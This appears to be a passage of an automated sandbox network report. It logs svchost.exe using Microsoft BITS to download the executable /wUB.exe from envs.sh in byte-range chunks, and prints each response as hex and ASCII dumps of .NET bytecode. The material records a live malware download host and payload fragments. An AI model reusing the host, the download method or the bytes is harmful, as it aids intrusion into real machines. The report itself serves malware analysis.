                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=2052-2183
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:41 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:41 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 132
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 2052-2183/80384
                                            2024-09-16 10:22:41 UTC132INData Raw: 00 00 04 2a 1a 72 72 26 00 70 2a 1a 20 19 4f 71 00 2a 1a 72 a0 26 00 70 2a 1a 72 ce 26 00 70 2a 1a 72 fc 26 00 70 2a 1a 20 52 33 71 00 2a 1a 72 2a 27 00 70 2a 1a 20 84 61 97 02 2a 1a 72 58 27 00 70 2a 1a 20 90 f1 fa 01 2a 1a 72 1d 28 00 70 2a 1a 20 79 ba 22 01 2a 1a 72 e2 28 00 70 2a 1a 20 dc f3 02 01 2a 1a 72 a7 29 00 70 2a 1a 72 6c 2a 00 70 2a 1a 20 56 9b cb 00 2a 1a 72 31 2b 00 70 2a 1a 72
                                            Data Ascii: *rr&p* Oq*r&p*r&p*r&p* R3q*r*'p* a*rX'p* *r(p* y"*r(p* *r)p*rl*p* V*r1+p*r


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.44975689.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:22:44 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=2184-2710
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:44 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:44 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 527
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 2184-2710/80384
                                            2024-09-16 10:22:44 UTC527INData Raw: f6 2b 00 70 2a 1a 20 11 6e d5 02 2a 1a 72 bb 2c 00 70 2a 1a 20 46 cc b5 01 2a 1a 72 80 2d 00 70 2a 1a 20 09 8d 39 05 2a 1a 72 45 2e 00 70 2a 1a 20 c6 d7 e5 03 2a 1a 72 0a 2f 00 70 2a 1a 72 cf 2f 00 70 2a 1a 20 8a 83 b1 04 2a 1a 72 94 30 00 70 2a 1a 72 59 31 00 70 2a 1a 20 15 73 fb 03 2a 1a 72 1e 32 00 70 2a 1a 72 e3 32 00 70 2a 1a 20 d6 f3 f8 00 2a 1a 72 a8 33 00 70 2a 1a 72 6d 34 00 70 2a 1a 20 87 40 f3 04 2a 1a 72 32 35 00 70 2a 1a 20 40 69 f6 03 2a 1a 72 f7 35 00 70 2a 1a 72 bc 36 00 70 2a 1a 72 81 37 00 70 2a 1a 20 95 82 a1 03 2a 13 30 01 00 0f 00 00 00 01 00 00 11 7e 01 00 00 04 6f 1e 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 02 00 00 11 7e 02 00 00 04 6f 1f 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 03 00 00 11 7e 03 00 00 04 6f 20
                                            Data Ascii: +p* n*r,p* F*r-p* 9*rE.p* *r/p*r/p* *r0p*rY1p* s*r2p*r2p* *r3p*rm4p* @*r25p* @i*r5p*r6p*r7p* *0~o+*0~o+*0~o


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            12192.168.2.44975989.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:22:47 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=2711-2883
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:48 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:47 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 173
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 2711-2883/80384
                                            2024-09-16 10:22:48 UTC173INData Raw: 00 00 04 72 c6 01 00 70 80 09 00 00 04 72 f8 01 00 70 80 0a 00 00 04 19 80 0b 00 00 04 72 2a 02 00 70 80 0c 00 00 04 72 5c 02 00 70 80 0d 00 00 04 72 8e 02 00 70 80 0e 00 00 04 72 c0 02 00 70 80 0f 00 00 04 72 f2 02 00 70 80 10 00 00 04 72 14 03 00 70 28 2a 00 00 0a 72 1e 03 00 70 28 2b 00 00 0a 80 11 00 00 04 2a 1b 30 09 00 1b 04 00 00 0b 00 00 11 7e 0b 00 00 04 20 e8 03 00 00 d8 28 2c 00 00 0a 7e 09 00 00 04 28 1f 01 00 06 28 2d 00 00 0a 80 09 00 00 04 7e 0a 00 00 04 28 1f 01 00 06 28 2d 00 00 0a 80 0a 00 00 04
                                            Data Ascii: rprpr*pr\prprprprp(*rp(+*0~ (,~((-~((-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            13192.168.2.44976089.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:22:50 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=2884-3472
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:50 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:50 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 589
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 2884-3472/80384
                                            2024-09-16 10:22:50 UTC589INData Raw: 7e 0c 00 00 04 28 1f 01 00 06 28 2d 00 00 0a 80 0c 00 00 04 7e 0d 00 00 04 28 1f 01 00 06 28 2d 00 00 0a 80 0d 00 00 04 7e 06 00 00 04 28 1f 01 00 06 28 2d 00 00 0a 80 06 00 00 04 7e 0e 00 00 04 28 1f 01 00 06 28 2d 00 00 0a 28 2e 00 00 0a 80 0e 00 00 04 7e 0f 00 00 04 28 1f 01 00 06 28 2d 00 00 0a 80 0f 00 00 04 de 15 25 28 2f 00 00 0a 13 04 16 28 30 00 00 0a 28 31 00 00 0a de 00 28 39 01 00 06 2d 06 16 28 30 00 00 0a 28 29 00 00 06 de 0f 25 28 2f 00 00 0a 13 05 28 31 00 00 0a de 00 28 28 00 00 06 7e 0e 00 00 04 72 8c 03 00 70 7e 0f 00 00 04 28 32 00 00 0a 0b 07 73 33 00 00 0a 6f 34 00 00 0a 6f 35 00 00 0a 13 06 11 06 28 2d 00 00 0a 28 36 00 00 0a 2d 0d 11 06 28 2d 00 00 0a 28 37 00 00 0a 26 07 28 38 00 00 0a 2c 0f 07 73 33 00 00 0a 13 07 11 07 6f 39 00
                                            Data Ascii: ~((-~((-~((-~((-(.~((-%(/(0(1(9-(0()%(/(1((~rp~(2s3o4o5(-(6-(-(7&(8,s3o9


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            14192.168.2.44976189.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:22:53 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=3473-3901
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:53 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:53 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 429
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 3473-3901/80384
                                            2024-09-16 10:22:53 UTC429INData Raw: 49 00 00 0a 13 0d 72 c4 04 00 70 72 e0 04 00 70 28 4a 00 00 0a 14 72 e2 04 00 70 17 8d 03 00 00 01 13 10 11 10 16 11 0d a2 11 10 13 11 11 11 14 14 17 8d 43 00 00 01 13 12 11 12 16 17 9c 11 12 28 4b 00 00 0a 11 12 16 90 2c 1f 11 11 16 9a 28 22 00 00 0a d0 32 00 00 01 28 25 00 00 0a 28 4c 00 00 0a 74 32 00 00 01 13 0d 13 13 11 13 14 72 00 05 00 70 17 8d 03 00 00 01 13 14 11 14 16 07 a2 11 14 14 14 16 17 28 4d 00 00 0a 11 13 14 72 16 05 00 70 17 8d 03 00 00 01 13 14 11 14 16 72 e0 04 00 70 a2 11 14 14 14 16 17 28 4d 00 00 0a 11 13 14 72 38 05 00 70 16 8d 03 00 00 01 14 14 14 17 28 4e 00 00 0a 26 14 13 13 11 0d 19 73 4f 00 00 0a 80 2c 00 00 04 de 0f 25 28 2f 00 00 0a 13 0e 28 31 00 00 0a de 00 28 ca 00 00 06 7e 06 00 00 04 28 27 00 00 06 0a 06 17 8d 46 00 00
                                            Data Ascii: Irprp(JrpC(K,("2(%(Lt2rp(Mrprp(Mr8p(N&sO,%(/(1(~('F


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            15192.168.2.44976289.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:22:55 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=3902-4187
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:55 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:55 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 286
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 3902-4187/80384
                                            2024-09-16 10:22:55 UTC286INData Raw: 00 0f 33 00 00 01 00 00 f5 00 60 55 01 0f 33 00 00 01 00 00 64 01 bc 20 02 0f 33 00 00 01 00 00 2f 02 2c 5b 02 0f 33 00 00 01 00 00 6a 02 f5 5f 03 0f 33 00 00 01 1b 30 02 00 6a 00 00 00 0c 00 00 11 17 28 55 00 00 0a 20 00 0c 00 00 28 56 00 00 0a 20 0f 27 00 00 28 57 00 00 0a de 0e 25 28 2f 00 00 0a 0b 28 31 00 00 0a de 00 00 73 58 00 00 0a 0c 08 02 6f 59 00 00 0a 0a de 2d de 0a 08 2c 06 08 6f 5a 00 00 0a dc de 1f 25 28 2f 00 00 0a 0d 20 b8 0b 00 00 28 2c 00 00 0a 28 31 00 00 0a de c9 28 31 00 00 0a de 00 06 2a 00 00 01 28 00 00 00 00 00 00 1c 1c 00 0e 33 00 00 01 02 00 31 00 0c 3d 00 0a 00 00 00 00 00 00 2a 00 1f 49 00 1f 33 00 00 01 1b 30 04 00 fc 00 00 00 0d 00 00 11 28 59 00 00 06 28 3e 00 00 0a 39 ec 00 00 00 73 5b 00 00 0a 0a 06 72 42 05 00 70 6f 5c
                                            Data Ascii: 3`U3d 3/,[3j_30j(U (V '(W%(/(1sXoY-,oZ%(/ (,(1(1*(31=*I30(Y(>9s[rBpo\


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            16192.168.2.44976389.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:22:57 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=4188-4386
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:57 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:57 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 199
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 4188-4386/80384
                                            2024-09-16 10:22:57 UTC199INData Raw: 6f 41 00 00 0a 06 28 42 00 00 0a 6f 43 00 00 0a 06 72 d8 05 00 70 28 5d 00 00 0a 6f 5e 00 00 0a 6f 5f 00 00 0a 72 d4 05 00 70 28 32 00 00 0a 6f 41 00 00 0a 06 28 42 00 00 0a 6f 43 00 00 0a 06 1b 8d 32 00 00 01 0c 08 16 72 60 05 00 70 a2 08 17 7e 0e 00 00 04 a2 08 18 72 8c 03 00 70 a2 08 19 7e 0f 00 00 04 a2 08 1a 72 d4 05 00 70 a2 08 28 40 00 00 0a 6f 41 00 00 0a 06 28 42 00 00 0a 6f 43 00 00 0a 06 72 d8 05 00 70 7e 0f 00 00 04 28 60 00 00 0a 72 d4 05 00 70 28 32 00 00 0a 6f 41 00 00 0a 06 28 42 00 00 0a 6f 43 00 00 0a de 0e 25 28 2f 00 00 0a 0b 28 31 00 00 0a de 00 2a 01 10 00 00 00 00 0f
                                            Data Ascii: oA(BoCrp(]o^o_rp(2oA(BoC2r`p~rp~rp(@oA(BoCrp~(`rp(2oA(BoC%(/(1*


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            17192.168.2.44976489.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:22:59 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=4387-4410
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:59 UTC421INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:59 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 24
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 4387-4410/80384
                                            2024-09-16 10:22:59 UTC24INData Raw: 00 de ed 00 0e 33 00 00 01 1b 30 02 00 32 00 00 00 0e 00 00 11 73 58 00
                                            Data Ascii: 302sX


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            18192.168.2.44976589.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:23:03 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=4411-4758
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:03 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:03 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 348
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 4411-4758/80384
                                            2024-09-16 10:23:03 UTC348INData Raw: 00 0a 72 52 06 00 70 6f 59 00 00 0a 0b 07 72 a0 06 00 70 6f 62 00 00 0a 0a de 12 de 0c 28 2f 00 00 0a 28 31 00 00 0a de 00 16 0a 2b 00 06 2a 00 00 01 10 00 00 00 00 00 00 20 20 00 0c 33 00 00 01 1b 30 02 00 33 00 00 00 05 00 00 11 73 63 00 00 0a 6f 64 00 00 0a 6f 65 00 00 0a 72 aa 06 00 70 6f 62 00 00 0a 2c 04 17 0a de 12 de 0c 28 2f 00 00 0a 28 31 00 00 0a de 00 16 0a 2b 00 06 2a 00 01 10 00 00 00 00 00 00 21 21 00 0c 33 00 00 01 1b 30 07 00 48 01 00 00 0f 00 00 11 72 b0 06 00 70 73 66 00 00 0a 0b 07 14 72 f6 06 00 70 16 8d 03 00 00 01 14 14 14 28 4b 00 00 0a 28 22 00 00 0a 0d 09 74 50 00 00 01 6f 67 00 00 0a 13 05 38 b6 00 00 00 11 05 6f 68 00 00 0a 28 22 00 00 0a 0c 08 17 8d 03 00 00 01 13 06 11 06 16 72 fe 06 00 70 a2 11 06 14 28 69 00 00 0a 6f 26 00
                                            Data Ascii: rRpoYrpob(/(1+* 303scodoerpob,(/(1+*!!30Hrpsfrp(K("tPog8oh("rp(io&


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            19192.168.2.44976689.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:23:07 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=4759-5147
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:07 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:07 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 389
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 4759-5147/80384
                                            2024-09-16 10:23:07 UTC389INData Raw: 8d 03 00 00 01 13 07 11 07 16 72 44 07 00 70 a2 11 07 14 28 69 00 00 0a 6f 26 00 00 0a 72 6e 07 00 70 16 28 6a 00 00 0a 16 33 04 17 0a de 58 11 05 6f 6c 00 00 0a 3a 3e ff ff ff de 16 11 05 75 4b 00 00 01 2c 0c 11 05 75 4b 00 00 01 6f 5a 00 00 0a dc de 0f 09 2c 0b 09 74 4b 00 00 01 6f 5a 00 00 0a dc de 0f 07 2c 0b 07 74 4b 00 00 01 6f 5a 00 00 0a dc de 0c 28 2f 00 00 0a 28 31 00 00 0a de 00 16 0a 2b 00 06 2a 41 64 00 00 02 00 00 00 26 00 00 00 d6 00 00 00 fc 00 00 00 16 00 00 00 00 00 00 00 02 00 00 00 26 00 00 00 ee 00 00 00 14 01 00 00 0f 00 00 00 00 00 00 00 02 00 00 00 0b 00 00 00 1a 01 00 00 25 01 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 01 00 00 36 01 00 00 0c 00 00 00 33 00 00 01 1b 30 02 00 31 00 00 00 10 00 00 11 16 0b 28 5d 00 00
                                            Data Ascii: rDp(io&rnp(j3Xol:>uK,uKoZ,tKoZ,tKoZ(/(1+*Ad&&%66301(]


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            20192.168.2.44976789.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:23:11 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=5148-5320
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:11 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:11 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 173
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 5148-5320/80384
                                            2024-09-16 10:23:11 UTC173INData Raw: 00 00 00 00 21 21 00 15 33 00 00 01 1b 30 07 00 30 01 00 00 12 00 00 11 18 17 1c 73 73 00 00 0a 80 13 00 00 04 15 6a 80 14 00 00 04 17 8d 58 00 00 01 80 15 00 00 04 73 74 00 00 0a 80 16 00 00 04 7e 13 00 00 04 20 00 c8 00 00 6f 75 00 00 0a 7e 13 00 00 04 20 00 c8 00 00 6f 76 00 00 0a 7e 13 00 00 04 02 7e 08 00 00 04 28 77 00 00 0a 6f 78 00 00 0a 02 80 07 00 00 04 17 80 12 00 00 04 73 28 00 00 0a 28 22 00 00 0a 80 19 00 00 04 28 56 00 00 06 28 2d 00 00 0a 28 60 00 00 06 16 80 1d 00 00 04 7e 13 00 00 04 7e 15 00 00
                                            Data Ascii: !!300ssjXst~ ou~ ov~~(woxs(("(V(-(`~~


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            21192.168.2.44976889.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:23:14 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=5321-5474
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:14 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:14 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 154
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 5321-5474/80384
                                            2024-09-16 10:23:14 UTC154INData Raw: 04 16 7e 15 00 00 04 8e b7 16 14 fe 06 5e 00 00 06 73 79 00 00 0a 14 6f 7a 00 00 0a 26 14 fe 06 65 00 00 06 73 7b 00 00 0a 0b 07 14 73 6f 00 00 0a 20 10 27 00 00 20 98 3a 00 00 6f 70 00 00 0a 73 6f 00 00 0a 20 10 27 00 00 20 98 3a 00 00 6f 70 00 00 0a 73 7c 00 00 0a 80 17 00 00 04 14 fe 06 63 00 00 06 73 7b 00 00 0a 14 17 17 73 7c 00 00 0a 80 1b 00 00 04 de 20 25 28 2f 00 00 0a 0c 16 80 12 00 00 04 28 31 00 00 0a de 0c 7e 18 00 00 04 6f 7d 00 00 0a 26 dc 06
                                            Data Ascii: ~^syoz&es{so ' :opso ' :ops|cs{s| %(/(1~o}&


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            22192.168.2.44977089.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:23:17 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=5475-5557
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:17 UTC421INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:17 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 83
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 5475-5557/80384
                                            2024-09-16 10:23:17 UTC83INData Raw: 2a 41 34 00 00 00 00 00 00 00 00 00 00 0e 01 00 00 0e 01 00 00 14 00 00 00 33 00 00 01 02 00 00 00 00 00 00 00 22 01 00 00 22 01 00 00 0c 00 00 00 00 00 00 00 13 30 05 00 94 01 00 00 13 00 00 11 73 63 00 00 0a 0b 1f 1b 8d 03 00 00 01 0d 09 16 72 4e
                                            Data Ascii: *A43""0scrN


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            23192.168.2.44977189.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:23:20 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=5558-5714
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:20 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:20 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 157
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 5558-5714/80384
                                            2024-09-16 10:23:20 UTC157INData Raw: 0a 00 70 a2 09 17 7e 1a 00 00 04 28 22 00 00 0a a2 09 18 28 31 01 00 06 a2 09 19 7e 1a 00 00 04 28 22 00 00 0a a2 09 1a 28 7e 00 00 0a a2 09 1b 7e 1a 00 00 04 28 22 00 00 0a a2 09 1c 07 6f 64 00 00 0a 72 58 0a 00 70 14 6f 7f 00 00 0a a2 09 1d 28 80 00 00 0a 6f 81 00 00 0a 72 6c 0a 00 70 72 86 0a 00 70 6f 7f 00 00 0a 72 8c 0a 00 70 28 2b 00 00 0a a2 09 1e 28 82 00 00 0a 0c 12 02 28 83 00 00 0a 72 90 0a 00 70 72 9c 0a 00 70 6f 7f 00 00 0a 72 a8 0a 00 70 72 b2 0a 00 70
                                            Data Ascii: p~("(1~("(~~("odrXpo(orlprporp(+((rprporprp


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            24192.168.2.44977289.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:23:23 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=5715-5997
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:23:23 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:23:23 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 283
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 5715-5997/80384
